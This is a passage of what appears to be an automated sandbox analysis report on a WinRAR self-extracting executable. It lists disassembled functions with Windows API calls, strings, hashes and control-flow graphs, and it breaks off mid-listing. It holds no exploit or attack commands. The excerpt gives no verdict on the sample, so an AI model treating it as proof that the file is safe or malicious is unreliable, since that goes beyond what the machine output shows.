                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0032F1B3
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0032F1BA
                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 0032F1D1
                                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001C9D0,00000000), ref: 0032F222
                                                                                              • Sleep.KERNEL32(?), ref: 0032F250
                                                                                              • DeleteObject.GDI32 ref: 0032F289
                                                                                              • DeleteObject.GDI32(?), ref: 0032F299
                                                                                              • CloseHandle.KERNEL32 ref: 0032F2DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf_wcslen
                                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$p05$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3014515783-634705955
                                                                                              • Opcode ID: f797fef7e606a0a7b10f90835ba10b4efe5ca53e2dcf2e4ce64736a0660dbea7
                                                                                              • Instruction ID: 3bc3d90bb991313550a3ccc41dafc2dbc90537a2a49fb6014d13db1e757a223b
                                                                                              • Opcode Fuzzy Hash: f797fef7e606a0a7b10f90835ba10b4efe5ca53e2dcf2e4ce64736a0660dbea7
                                                                                              • Instruction Fuzzy Hash: 72611A75500320AFD323ABA5FC49F6B7BECEB49745F000439F5459B2A1DB74A884CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031BA94 Relevance: 7.6, APIs: 5, Instructions: 105fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1075 31ba94-31bab8 call 32ffd0 1078 31bb20-31bb29 FindNextFileW 1075->1078 1079 31baba-31bac7 FindFirstFileW 1075->1079 1081 31bb3b-31bbf8 call 32192f call 31d71d call 322924 * 3 1078->1081 1082 31bb2b-31bb39 GetLastError 1078->1082 1080 31bac9-31badb call 31cf32 1079->1080 1079->1081 1090 31baf7-31bb00 GetLastError 1080->1090 1091 31badd-31baf5 FindFirstFileW 1080->1091 1088 31bbfd-31bc0a 1081->1088 1085 31bb12-31bb1b 1082->1085 1085->1088 1093 31bb10 1090->1093 1094 31bb02-31bb05 1090->1094 1091->1081 1091->1090 1093->1085 1094->1093 1096 31bb07-31bb0a 1094->1096 1096->1093 1098 31bb0c-31bb0e 1096->1098 1098->1085
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BABD
                                                                                                • Part of subcall function 0031CF32: _wcslen.LIBCMT ref: 0031CF56
                                                                                              • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BAEB
                                                                                              • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BAF7
                                                                                              • FindNextFileW.KERNEL32(?,?,?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BB21
                                                                                              • GetLastError.KERNEL32(?,?,?,?,0031B98B,000000FF,?,?), ref: 0031BB2D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 42610566-0
                                                                                              • Opcode ID: fb700d7706f21ac4fe34dd8249a19c03c6fc5d21969bbc444a49d6114f780d7d
                                                                                              • Instruction ID: 65170da8c475e69a88d4f477f65d44e52f31e214ae40dd6fbbaa8295cae68eb8
                                                                                              • Opcode Fuzzy Hash: fb700d7706f21ac4fe34dd8249a19c03c6fc5d21969bbc444a49d6114f780d7d
                                                                                              • Instruction Fuzzy Hash: 14416F76600519ABCB2ADF64DC84AE9F3B8FB49350F1042A6E56ED7210D7346ED4CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 003192C6 Relevance: 4.7, APIs: 1, Strings: 1, Instructions: 1157COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 003192CB
                                                                                                • Part of subcall function 0031D656: _wcsrchr.LIBVCRUNTIME ref: 0031D660
                                                                                                • Part of subcall function 0031CAA0: _wcslen.LIBCMT ref: 0031CAA6
                                                                                                • Part of subcall function 00321907: _wcslen.LIBCMT ref: 0032190D
                                                                                                • Part of subcall function 0031B5D6: _wcslen.LIBCMT ref: 0031B5E2
                                                                                                • Part of subcall function 0031B5D6: __aulldiv.LIBCMT ref: 0031B60E
                                                                                                • Part of subcall function 0031B5D6: GetCurrentProcessId.KERNEL32(00000000,?,000186A0,00000000,?,?,00000800,?), ref: 0031B615
                                                                                                • Part of subcall function 0031B5D6: _swprintf.LIBCMT ref: 0031B640
                                                                                                • Part of subcall function 0031B5D6: _wcslen.LIBCMT ref: 0031B64A
                                                                                                • Part of subcall function 0031B5D6: _swprintf.LIBCMT ref: 0031B6A0
                                                                                                • Part of subcall function 0031B5D6: _wcslen.LIBCMT ref: 0031B6AA
                                                                                                • Part of subcall function 00314727: __EH_prolog.LIBCMT ref: 0031472C
                                                                                                • Part of subcall function 0031A212: __EH_prolog.LIBCMT ref: 0031A217
                                                                                                • Part of subcall function 0031B8E6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B8FA
                                                                                                • Part of subcall function 0031B8E6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0031B5B5,?,?,?,0031B405,?,00000001,00000000,?,?), ref: 0031B92B
                                                                                              Strings
                                                                                              • __tmp_reference_source_, xrefs: 00319596
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$H_prolog$AttributesFile_swprintf$CurrentProcess__aulldiv_wcsrchr
                                                                                              • String ID: __tmp_reference_source_
                                                                                              • API String ID: 70197177-685763994
                                                                                              • Opcode ID: 10b350965f5216183548c791254454979db8a051e4ea07f7605dc5a43618ea50
                                                                                              • Instruction ID: 6ba3fd11ed12f8873810c9064d72896a4f6ff933e93243f44253341c58b03a69
                                                                                              • Opcode Fuzzy Hash: 10b350965f5216183548c791254454979db8a051e4ea07f7605dc5a43618ea50
                                                                                              • Instruction Fuzzy Hash: B7A2D871904245AEDF1FDF64C895BE9BBB9BF0D300F0941BAE8499B182D73059C9CBA1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 003391B0 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(00000000,?,00339186,00000000,0034D570,0000000C,003392DD,00000000,00000002,00000000), ref: 003391D1
                                                                                              • TerminateProcess.KERNEL32(00000000,?,00339186,00000000,0034D570,0000000C,003392DD,00000000,00000002,00000000), ref: 003391D8
                                                                                              • ExitProcess.KERNEL32 ref: 003391EA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 1703294689-0
                                                                                              • Opcode ID: 29dc8d89e28a12efef0c6f559481b0ddc057c0b2b46f22b169b7eccfbd90312d
                                                                                              • Instruction ID: c9f88917da05692ca3c933d0679b08ecc32989fe6d24e06c2acc455718250e4e
                                                                                              • Opcode Fuzzy Hash: 29dc8d89e28a12efef0c6f559481b0ddc057c0b2b46f22b169b7eccfbd90312d
                                                                                              • Instruction Fuzzy Hash: 92E04639000508EFCF236F60DD88B593B2EEB41342F010424F9089E121CB75ED92CB80
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032C9D0 Relevance: 104.0, APIs: 49, Strings: 10, Instructions: 734windowfilesleepCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0032C9D5
                                                                                                • Part of subcall function 003112F6: GetDlgItem.USER32(00000000,00003021), ref: 0031133A
                                                                                                • Part of subcall function 003112F6: SetWindowTextW.USER32(00000000,003445F4), ref: 00311350
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0032CAC1
                                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032CADF
                                                                                              • IsDialogMessageW.USER32(?,?), ref: 0032CAF2
                                                                                              • TranslateMessage.USER32(?), ref: 0032CB00
                                                                                              • DispatchMessageW.USER32(?), ref: 0032CB0A
                                                                                              • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0032CB2D
                                                                                              • EndDialog.USER32(?,00000001), ref: 0032CB50
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 0032CB73
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0032CB8E
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,003445F4), ref: 0032CBA1
                                                                                                • Part of subcall function 0032E598: _wcslen.LIBCMT ref: 0032E5C2
                                                                                              • SetFocus.USER32(00000000), ref: 0032CBA8
                                                                                              • _swprintf.LIBCMT ref: 0032CC07
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0032CC6A
                                                                                              • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0032CC92
                                                                                              • GetTickCount.KERNEL32 ref: 0032CCB0
                                                                                              • _swprintf.LIBCMT ref: 0032CCC8
                                                                                              • GetLastError.KERNEL32(?,00000011), ref: 0032CCFA
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0032CD4D
                                                                                              • _swprintf.LIBCMT ref: 0032CD84
                                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp), ref: 0032CDD8
                                                                                              • GetCommandLineW.KERNEL32 ref: 0032CDEE
                                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00361482,00000400,00000001,00000001), ref: 0032CE45
                                                                                              • ShellExecuteExW.SHELL32(0000003C), ref: 0032CE6D
                                                                                              • WaitForInputIdle.USER32(?,00002710), ref: 0032CEA1
                                                                                              • Sleep.KERNEL32(00000064), ref: 0032CEB5
                                                                                              • UnmapViewOfFile.KERNEL32(?,?,0000421C,00361482,00000400), ref: 0032CEDE
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0032CEE7
                                                                                              • _swprintf.LIBCMT ref: 0032CF1A
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0032CF79
                                                                                              • SetDlgItemTextW.USER32(?,00000065,003445F4), ref: 0032CF90
                                                                                              • GetDlgItem.USER32(?,00000065), ref: 0032CF99
                                                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0032CFA8
                                                                                              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0032CFB7
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0032D064
                                                                                              • _wcslen.LIBCMT ref: 0032D0BA
                                                                                              • _swprintf.LIBCMT ref: 0032D0E4
                                                                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 0032D12E
                                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0032D148
                                                                                              • GetDlgItem.USER32(?,00000068), ref: 0032D151
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0032D167
                                                                                              • GetDlgItem.USER32(?,00000066), ref: 0032D181
                                                                                              • SetWindowTextW.USER32(00000000,0036389A), ref: 0032D1A3
                                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0032D203
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0032D216
                                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001C7B0,00000000,?), ref: 0032D2B9
                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 0032D393
                                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0032D3D5
                                                                                                • Part of subcall function 0032D884: __EH_prolog.LIBCMT ref: 0032D889
                                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0032D3F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$MessageText$Send$Window_swprintf$File$DialogErrorLast$H_prologLongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellSleepTickTranslateUnmapWait__vswprintf_c_l
                                                                                              • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$lb4$winrarsfxmappingfile.tmp
                                                                                              • API String ID: 3103142498-803204324
                                                                                              • Opcode ID: 61a99464e575964e3b8b6d795e1300070900edd3019efbad14ee4775acb745c6
                                                                                              • Instruction ID: b75881717157ab94054eeeafd02334ec97c215546675ba61cb8a3be52316292d
                                                                                              • Opcode Fuzzy Hash: 61a99464e575964e3b8b6d795e1300070900edd3019efbad14ee4775acb745c6
                                                                                              • Instruction Fuzzy Hash: 2342E871940364BEEB239BB4FC4AFFE77ACAB01701F044154F644AA1E2CBB45985CB62
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00321B83 Relevance: 100.1, APIs: 23, Strings: 34, Instructions: 316libraryfileloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 272 321b83-321ba6 call 32ffd0 GetModuleHandleW 275 321c07-321e68 272->275 276 321ba8-321bbf GetProcAddress 272->276 277 321f34-321f60 GetModuleFileNameW call 31d6a7 call 32192f 275->277 278 321e6e-321e79 call 3389ee 275->278 279 321bc1-321bd7 276->279 280 321bd9-321be9 GetProcAddress 276->280 296 321f62-321f6e call 31c619 277->296 278->277 290 321e7f-321ead GetModuleFileNameW CreateFileW 278->290 279->280 281 321c05 280->281 282 321beb-321c00 280->282 281->275 282->281 292 321f28-321f2f CloseHandle 290->292 293 321eaf-321ebb SetFilePointer 290->293 292->277 293->292 294 321ebd-321ed9 ReadFile 293->294 294->292 297 321edb-321f00 294->297 301 321f70-321f7b call 321b3b 296->301 302 321f9d-321fc4 call 31d71d GetFileAttributesW 296->302 300 321f1d-321f26 call 32169e 297->300 300->292 309 321f02-321f1c call 321b3b 300->309 301->302 311 321f7d-321f9b CompareStringW 301->311 312 321fc6-321fca 302->312 313 321fce 302->313 309->300 311->302 311->312 312->296 315 321fcc 312->315 316 321fd0-321fd5 313->316 315->316 317 321fd7 316->317 318 32200c-32200e 316->318 321 321fd9-322000 call 31d71d GetFileAttributesW 317->321 319 322014-32202b call 31d6f1 call 31c619 318->319 320 32211b-322125 318->320 331 322093-3220c6 call 314a20 AllocConsole 319->331 332 32202d-32208e call 321b3b * 2 call 31f937 call 314a20 call 31f937 call 32b7f4 319->332 326 322002-322006 321->326 327 32200a 321->327 326->321 329 322008 326->329 327->318 329->318 337 322113-322115 ExitProcess 331->337 338 3220c8-32210d GetCurrentProcessId AttachConsole call 334fa3 GetStdHandle WriteConsoleW Sleep FreeConsole 331->338 332->337 338->337
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32), ref: 00321B9C
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00321BAE
                                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00321BDF
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00321E89
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00321EA3
                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00321EB3
                                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,$M4,00000000), ref: 00321ED1
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00321F29
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00321F3E
                                                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,$M4,?,00000000,?,00000800), ref: 00321F92
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,$M4,00000800,?,00000000,?,00000800), ref: 00321FBC
                                                                                              • GetFileAttributesW.KERNEL32(?,?,M4,00000800), ref: 00321FF8
                                                                                                • Part of subcall function 00321B3B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00321B56
                                                                                                • Part of subcall function 00321B3B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0032063A,Crypt32.dll,00000000,003206B4,00000200,?,00320697,00000000,00000000,?), ref: 00321B78
                                                                                              • _swprintf.LIBCMT ref: 0032206A
                                                                                              • _swprintf.LIBCMT ref: 003220B6
                                                                                                • Part of subcall function 00314A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00314A33
                                                                                              • AllocConsole.KERNEL32 ref: 003220BE
                                                                                              • GetCurrentProcessId.KERNEL32 ref: 003220C8
                                                                                              • AttachConsole.KERNEL32(00000000), ref: 003220CF
                                                                                              • _wcslen.LIBCMT ref: 003220E4
                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 003220F5
                                                                                              • WriteConsoleW.KERNEL32(00000000), ref: 003220FC
                                                                                              • Sleep.KERNEL32(00002710), ref: 00322107
                                                                                              • FreeConsole.KERNEL32 ref: 0032210D
                                                                                              • ExitProcess.KERNEL32 ref: 00322115
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                              • String ID: $M4$$P4$$Q4$(N4$(R4$,O4$4Q4$<M4$<P4$@N4$DO4$DR4$DXGIDebug.dll$LQ4$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$XM4$XN4$\O4$\R4$`P4$dQ4$dwmapi.dll$kernel32$pM4$pN4$tO4$uxtheme.dll$xP4$xQ4$xR4$M4$N4
                                                                                              • API String ID: 1207345701-4108843577
                                                                                              • Opcode ID: 522bfc9f70282aab9cb35dddbe75712597b8bc3b2a542b44d5bca72b6283f49e
                                                                                              • Instruction ID: c950abe48a562f0f03cb4ff81d5d991b4096e6320df113ef39f7a96db4386ac1
                                                                                              • Opcode Fuzzy Hash: 522bfc9f70282aab9cb35dddbe75712597b8bc3b2a542b44d5bca72b6283f49e
                                                                                              • Instruction Fuzzy Hash: 40D1A1B9408794ABD733DF509949BDFBBECBB85704F40092DF2899E151CBB0A548CB92
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0031ED87 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 0031ED90
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0031EDCC
                                                                                                • Part of subcall function 0031D6A7: _wcslen.LIBCMT ref: 0031D6AF
                                                                                                • Part of subcall function 00321907: _wcslen.LIBCMT ref: 0032190D
                                                                                                • Part of subcall function 00322ED2: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0031CF18,00000000,?,?), ref: 00322EEE
                                                                                              • _wcslen.LIBCMT ref: 0031F109
                                                                                              • __fprintf_l.LIBCMT ref: 0031F23C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000374000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631484612.0000000000375000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_310000_work.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l
                                                                                              • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                                                                              • API String ID: 566448164-801612888
                                                                                              • Opcode ID: 804b06d83274b04772aad2d66fbc3da8454e6e8d4bafda8f44d81636e0d2430d
                                                                                              • Instruction ID: 1a894141064539a44337ffe77a07d6e86ca273d735f38d155c3a0f364c0d112f
                                                                                              • Opcode Fuzzy Hash: 804b06d83274b04772aad2d66fbc3da8454e6e8d4bafda8f44d81636e0d2430d
                                                                                              • Instruction Fuzzy Hash: 5832D075900218AFCF2ADF68C881AEA77A9FF0C710F41456AF9069B291EB71DDC5CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0032E619 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 0032C758: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0032C769
                                                                                                • Part of subcall function 0032C758: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0032C77A
                                                                                                • Part of subcall function 0032C758: IsDialogMessageW.USER32(00020486,?), ref: 0032C78E
                                                                                                • Part of subcall function 0032C758: TranslateMessage.USER32(?), ref: 0032C79C
                                                                                                • Part of subcall function 0032C758: DispatchMessageW.USER32(?), ref: 0032C7A6
                                                                                              • GetDlgItem.USER32(00000068,00371CF0), ref: 0032E62D
                                                                                              • ShowWindow.USER32(00000000,00000005,?,?,00000001,?,?,0032C9A9,003460F0,00371CF0,00371CF0,00001000,?,00000000,?), ref: 0032E655
                                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0032E660
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,003445F4), ref: 0032E66E
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0032E684
                                                                                              • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0032E69E
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0032E6E2
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0032E6F0
                                                                                              • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0032E6FF
                                                                                              • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0032E726
                                                                                              • SendMessageW.USER32(00000000,000000C2,00000000,0034549C), ref: 0032E735
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1631398816.0000000000311000.00000020.00000001.01000000.00000009.sdmp, Offset: 00310000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1631384190.0000000000310000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631423791.0000000000344000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000350000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1631439370.0000000000357000.00000004.00000001.01000000.00000009.sdmpDownload File
